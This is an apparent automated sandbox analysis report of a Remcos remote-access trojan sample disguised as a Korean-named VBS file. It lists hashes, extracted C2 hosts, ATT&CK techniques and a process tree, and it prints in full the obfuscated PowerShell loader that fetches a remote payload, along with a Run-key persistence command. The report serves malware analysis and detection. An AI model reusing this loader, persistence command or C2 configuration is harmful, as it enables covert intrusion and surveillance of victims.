remcos | fa7ae981291ded476e9b3764bcdb12f5b84f4f7741c277f047275e5d855c3390

General

Target

화물_계획__부 가능_계획_pdg.vbs
Size

35KB
MD5

4c39309bcbb9c031d27c488bac0ed6ec
SHA1

29e1270f6a8eaa63fa37f33760a3a1d33e807863
SHA256

2b9370b8bd4cf96c6b5f44b84e74a767fa5182ab30638fce31de2616aa01ab50
SHA512

928eeb213f33f015a6424506c2a8d023e636cddc8392774df829dfb56cb22ddc4ccae611f33527665a33d5692e0672d38b0979ddfb86ff4883047cafa0c3aa86
SSDEEP

384:65cVCJUSNoVEItu5uBHNIc6n+210mlT5Ve3qOGHr84F4K:65cXSNhCu5qNIc6+2HlNMqOOr8gx

Score

10^/10

remcos fresh discovery execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

Fresh

C2

dourtes4hnbouy1.duckdns.org:2487

dourtes4hnbouy1.duckdns.org:2488

dourtes4hnbouy2.duckdns.org:2487

dourtes4hnbouy3.duckdns.org:2487

dourtes4hnbouy4.duckdns.org:2487

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
false
keylog_crypt
false
keylog_file
kamzourts.dat
keylog_flag
false
keylog_path
%AppData%
mouse_option
false
mutex
kamncbiu-LBXP9X
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 16 IoCs

flow	pid	Process
4	2036	WScript.exe
8	3128	powershell.exe
39	2216	msiexec.exe
41	2216	msiexec.exe
43	2216	msiexec.exe
47	2216	msiexec.exe
51	2216	msiexec.exe
60	2216	msiexec.exe
62	2216	msiexec.exe
66	2216	msiexec.exe
67	2216	msiexec.exe
72	2216	msiexec.exe
73	2216	msiexec.exe
77	2216	msiexec.exe
79	2216	msiexec.exe
83	2216	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rhabdosphere = "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\\Software\\Extratemporal\\').Konkursbegringer;%nervemediciners% ($Decoke247)"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3128	powershell.exe
3436	powershell.exe

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
3128	powershell.exe
3436	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2216	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
3436	powershell.exe
2216	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
2696	reg.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
3128	powershell.exe
3128	powershell.exe
3436	powershell.exe
3436	powershell.exe
3436	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3436	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3128	powershell.exe
Token: SeDebugPrivilege	3436	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2216	msiexec.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2036 wrote to memory of 3128	2036	WScript.exe	83
PID 2036 wrote to memory of 3128	2036	WScript.exe	83
PID 3436 wrote to memory of 2216	3436	powershell.exe	100
PID 3436 wrote to memory of 2216	3436	powershell.exe	100
PID 3436 wrote to memory of 2216	3436	powershell.exe	100
PID 3436 wrote to memory of 2216	3436	powershell.exe	100
PID 2216 wrote to memory of 872	2216	msiexec.exe	104
PID 2216 wrote to memory of 872	2216	msiexec.exe	104
PID 2216 wrote to memory of 872	2216	msiexec.exe	104
PID 872 wrote to memory of 2696	872	cmd.exe	107
PID 872 wrote to memory of 2696	872	cmd.exe	107
PID 872 wrote to memory of 2696	872	cmd.exe	107

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\화물_계획__부 가능_계획_pdg.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2036
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3128

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Arrenotokous='Homogeniserendes';;$Gorged='Woodless';;$Ramuliferous='Udbyttekonfiskationernes';;$Origenize='Anrettede';;$Stbningen=$host.Name;function Grecized($Roburite){If ($Stbningen) {$Scyphopolyp=5} for ($Doucepere=$Scyphopolyp;;$Doucepere+=6){if(!$Roburite[$Doucepere]) { break };$Indkringsfases+=$Roburite[$Doucepere];$Nonvaporousness='Turboladers'}$Indkringsfases}function Indpiskedes($Solbatterier){ .($Afkrydser) ($Solbatterier)}$Douceperensignificance=Grecized 'SkndsnNonreESkovstAssol.Ove tW';$Douceperensignificance+=Grecized ' .upeEReserBEfterC I aulSmu tiMo faeJerseN Monat';$Percussiveness=Grecized 'Haa tMSensio,kitjzFlashi ForllTerbel T.lgaDagpl/';$Khz=Grecized ' BrugTko tolTrmassTele.1error2';$Naturalisterne='Purpo[Tom uN InsueResert ande. eskSFnotyE RuslRTekstvEnh dIGy.efCTe riEWondePSpr eO T psi D wnn BridtFattiM ReedAFas lN aadeaB saeg nwiESm glRPalla]Rack :Menne: SrboSenginE O blC CompUOutj.r aziIRattlt Ko ayDermaPAfgifr O.enOPhenoTudlbeO irkucNoncooTransL Data= Bqnh$ CossKPreseHWelteZ';$Percussiveness+=Grecized 'B ewa5Xanth.Neapo0honno Vaske(PhlebWPteroiHypernAlloddAnthro BolvwFiantsScyth TzitzN ProsT Fo g St.rk1Forma0Ml ek.Videb0Vicar;Capt Bo.erWLnnetiUds.enChaet6Sedde4Langh;Baand anvisxOverl6Kultu4 coac;Refa Indlar TyndvLngod: Saml1Ety o3Nedsl1 k in.Tranq0 r gr) oggi .iscoG .aboeMicrocEru akLecthoAmapa/Radi 2Micro0Disti1g und0 Con 0 Hirs1Sla b0 ight1Urege UnnatFOpsnuiLgtnir FilteAlitafEncomo IndoxEkstr/Udfre1 ap,e3Eff k1I,ter.Bund 0';$Cliqueless106=Grecized ' Ne vUCa nesSigteeGaardrNahan-EyolfAHmsk.GRearmEH.cksNStandt';$Anarchy=Grecized ' UnshhTitictRustit KartpRanvesValut: ric/Mod r/YoupdsEsophhVaabea FasaaAutomv KorriStimupFormurRe ayoAlchef P ure SuccsU,delsObseriNonfioB.slunUnwalaF millOverg. SkifcH peioAutoommis i/ Ph nTProlohCircuiaffilaHjernzApodai magonPleaseRagef.RabarpSnders c mbd Str >PalaihOligotbrkmit,agenphostasSknki:D nat/Uncon/Tur.ue Ro lxKnledpConsolf ancoDrivrr,leckeAutolm TowseL avesInteroUnmeepLkkesoMatrotUnspiaPreyemElskviSonofaPemo..glomucOplanoByzanmTrili/ wretT rothBle,siOccasah.nknz NoneiSpd,rnT msve Chee.Paatap ,tinsirrevd';$Unreadable=Grecized 'hesit>';$Afkrydser=Grecized 'AdreniHotteeOphthX';$Sexdigitated='Stereoscopically';$ringeklokkers='\conventionalises.Tnd';Indpiskedes (Grecized 'Fnblg$N.rsegSup.rLForhaO SuprBPostvA ReinLNonfe: NonmDBusk.eTawatukieyet dloeEPreinrRingeOToetag,nfereEvighlOrthoA.nchatPri,toFraflSforlnEEngan=Skamb$ mophE femNtilbavStict:Unp.rAOver pInostpTalacdPositADistrt rykAHypov+Bibac$MasseROi pliIndusN OutsgKlippE Lov KSipprLSubt,ODggelK hertk AngoESneglRMurenS');Indpiskedes (Grecized 'Sem r$ BabigC llelRun,soSkrivBBidcoAGr aalm.nuf: NounTS nseJProdueTrashN .rseEChut,SScy,htOptomEVeridYDrabsD FineeThoralTrykksDri teForhon ThouSschel=Dunga$IsotraF rstnorb la erdsrepihyc SnakhHalvkyHedas.Ciff SStifip ColllIndicIGynanTSymph(Demon$idefouExpiaNPoin.Rsha.nECredeA RoadDNummeaBowleB XeroL lyk,eMuseo)');Indpiskedes (Grecized $Naturalisterne);$Anarchy=$tjenesteydelsens[0];$Carpodetus=(Grecized ' emal$ Respg De.oLRupicOOrdfoBthuggaUprail,cytt: Cochg fbilADomflAEtc iTSpo.sC ,rouhUn.cr=OverbnEluviE Norww Hype-Pern.oCoadvbBromijParasEI,strc ugnTSodom MathiS PleiYIns fSUdiscT inge UnhamOprrs.D nta$Crib dIsomeo UdryuPassicSigtvEShairP RygeEint,nRSp one S ygntidsbsUp avIMy,paG naxoN NonaiCoenafquetziSouthcBatraaAnalynUdsmycOpspae');Indpiskedes ($Carpodetus);Indpiskedes (Grecized 'Kv,av$ Ettyg KoloaPilleaDagsot Lu tcAnti hDesti.b aavH PakeeP lycalu efdBekereHelgorFagsps Unne[Sandw$ola sC elfilI proimagneq slinuM nteeDerogl GesneNonclsO torsEkstr1G.aas0Br,ds6Rotte]Plnek=Poeci$ VentPAspideOdin.rStaphcHidfrustavnsHe tesdes ai AttavEri.oeFibernFiltreCemens Chars');$Drvogternes=Grecized 'D.mna$KundggudmaraS edbaFogdet PartcDatabhBrnee.Co,biD ntihoAllelw Sy pnDiffulP oceoCompua OpsldTrailFH rebi PretlVi keeUppe,(Azte $.xcisAAarrina.etyaUddatrSkaa,cAdrtthTr,deyNongl,Retor$merglVDad.iaFlaskr FolkiCustogAst gh u vaeSud nd WronsFauntkseamrrVedkeaSeacovFastseOv retAspirsRecon)';$Varighedskravets=$Deuterogelatose;Indpiskedes (Grecized ' Tele$Gran g anelLSailfOCommyB U trA KernlCera.:C,balWJom ri VassLAlohalPostuA Klos=Bygni( nemeTBelize k ooS MombT aeri-Sags PGas rAsalmetRi bahSt am Ja z$VagarV HjemA BongrImitaIKanthgScrewhEfterEE staDGenitSbyronksertuRRestiAOu daVLachrEOtopit NvniSSeri )');while (!$Willa) {Indpiskedes (Grecized ' kitt$agadigKdebrl EmbooJuniobCryptaGladelJowel:ButteVSt.ckrLairig Ti,seThreanFuturdInsu,eDyrlg=Soveh$S rreOTam svSombreMoresrM entsAspirp rprgnexe udGlib t') ;Indpiskedes $Drvogternes;Indpiskedes (Grecized 'consts onttNeuroAPhalarGimpeTSk kt-UnmatSApparL FrakEVbnerEPr pop Regn Outdr4');Indpiskedes (Grecized 'Antip$GroungKrliglElutrO,xtrabRutefa nusiLStorm: U.rewClif,ICho.lLRe lalUsandASmoot=Binds(SkibstforgieChertsFishitPru t- OffiPPl ylA God,TBuck h Bibl Minus$Cli cvMi enaAlbumRBaronI Be hgAnskah xbeESt krDGenneS DaikkUnd.rRGlideAEndesVJourneNeds TnringsKatte)') ;Indpiskedes (Grecized 'Accel$ArillgShorelIlgodoRet rBD kumAPreselGiggl:VejleU IsooNBjergR Ot mIKylliPRyttepEud.eESkyttdCarpe=Soden$Subtog KardLCrushOTiggebRivinA Emb.lRedig: BasucTeaterKulkaOProtof Fulgt LagkS open+Flams+Pseud%,nspn$ eadot nalJKrediE CoernsaluteFor lSSnudeT TeddE lusy ElecDS uble TelelBacteSHimmeEFruenNexurgSUnoe .Fl keCJanniOSalthU Pos.nRestaT') ;$Anarchy=$tjenesteydelsens[$Unripped]}$Styrelses=287680;$Befile=33163;Indpiskedes (Grecized 'R.frn$RrhneGCylinLfa geoblackbAfgreain omLCente:V gnesHaustK S,roPBesnipDag ee supes Poli Ne.le=Gasse .arimGwindoeEventTIrske-ImidscIndvnoFormoNfeodotAffale PreinCarpotSk,ms Exsan$Progrvout.oAC relRIge,viS nkoGwait HTaffeELokalDAarstSJon uKAmfibR OpkaA Reolv TectEJimmiTLejr s');Indpiskedes (Grecized 'Ca,ry$SericgInv llApoteoOpdagbXerifaspecilS vne:Fo dsEBystekButtosAnelae Topsr MorncUdskie Ether O ereGuld.nTrkpadSmorzeOutpo3 name Ud ik=Ta ab Outr [HydroSAntagy SocisAmitytCenteeVaccemArbit.RenteCDunneoRh,omnTri,rvStbeseFagelrJordetMithr] Fogl:Mem n: C rcFFundrr DgnroStenkmUnderB ModtaProdus,loore Sta 6Alacr4S,illSetapet Kr.nrPerveibiodynCyklcgF,ura(Prep $VanrgS OpnakHoar p VerdpDivereNositsTapet)');Indpiskedes (Grecized ',ohre$B.ssiGFouril.mbibO.ovedbDemo aBi eslSbebo:DdsboPEntydRResorI Ame.S AntioSaltkPamadoldefm,Y abilsInappNEvakuIHroa nMo dagKol rEThrowrLurki Trinf=Konto Opfyl[ClasmsEks kyKrsels Mid tSevenehollomRive .Ac letReloaeAnmelxExce.TRival.T lskESamarNspr ncDeviaOTildrDKbma Ipap lNTransGBlotc]Skibs:Legio: KvalAOverpsHermicDissoIFathoi Sulp. StavGTerr EChedetAbnorsPancaT N nvRGuideIWise n onjgH avy(round$PujarECalipkHan.eS .ontEDitmarSubobcH,larE verkrPolype ConjNUnharDEduafEA.tie3Ki no)');Indpiskedes (Grecized 'Samle$ BathgRetraLDropsoBrdk BRijksAKofftlForgp:NedveUPrelodCertaK Sk,fO p,ccbMillilEj rleArrog2 Su c3palmi4Anton= Conv$LipohpnaissRMagtsI .iriS ndatOSkolePFalc,LUranoyCres Srekrun Maili H moNSge oGSag eeI idiRBebo .OmplaS fad.uSkaerbBrddes Mestt ref,rRe orIfrysen KubiGhjsan(sta,e$g.rlesLibelTDriftYDolkerAfslrEMyrssLS.idsSem usE fo,kS Nonc, ,kat$Surr,BCope eCannufSt esI,ldslL artrEGyasd)');Indpiskedes $Udkoble234;"
1⤵
- Command and Scripting Interpreter: PowerShell
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3436
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2216
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:872
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rhabdosphere" /t REG_EXPAND_SZ /d "%nervemediciners% -windowstyle 1 $Decoke247=(gp -Path 'HKCU:\Software\Extratemporal\').Konkursbegringer;%nervemediciners% ($Decoke247)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:2696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
806286a9ea8981d782ba5872780e6a4c

SHA1
99fe6f0c1098145a7b60fda68af7e10880f145da

SHA256
cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

SHA512
362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vgcpn0wj.cuz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\conventionalises.Tnd

Filesize
417KB

MD5
b8267bb25d5a59bcecb954056bbccd90

SHA1
27984573c59bf3e2d726f3b7b011671caf50fa38

SHA256
8b9e7d853510e474c2781553ba6a59cd2483b30603923a36cd7a9c1ea40b9b3e

SHA512
24aeca3998b197f92ab19a24cf954195fbfa1026dcc19a0e3414ee2ab1cb86afc3e12686b72faeda510288233f57c979b4731f484b96be4429325cadc7d4c4ad

Download Submit
memory/2216-59-0x0000000000DE0000-0x0000000002034000-memory.dmp

Filesize
18.3MB

Download
memory/2216-57-0x0000000000DE0000-0x0000000002034000-memory.dmp

Filesize
18.3MB

Download
memory/3128-18-0x00007FF8E8383000-0x00007FF8E8385000-memory.dmp

Filesize
8KB

Download
memory/3128-4-0x00007FF8E8383000-0x00007FF8E8385000-memory.dmp

Filesize
8KB

Download
memory/3128-19-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/3128-21-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/3128-25-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/3128-17-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/3128-16-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/3128-15-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

Filesize
10.8MB

Download
memory/3128-5-0x000002065B810000-0x000002065B832000-memory.dmp

Filesize
136KB

Download
memory/3436-30-0x0000000005E70000-0x0000000005ED6000-memory.dmp

Filesize
408KB

Download
memory/3436-40-0x0000000006020000-0x0000000006374000-memory.dmp

Filesize
3.3MB

Download
memory/3436-29-0x0000000005690000-0x00000000056F6000-memory.dmp

Filesize
408KB

Download
memory/3436-42-0x0000000006520000-0x000000000653E000-memory.dmp

Filesize
120KB

Download
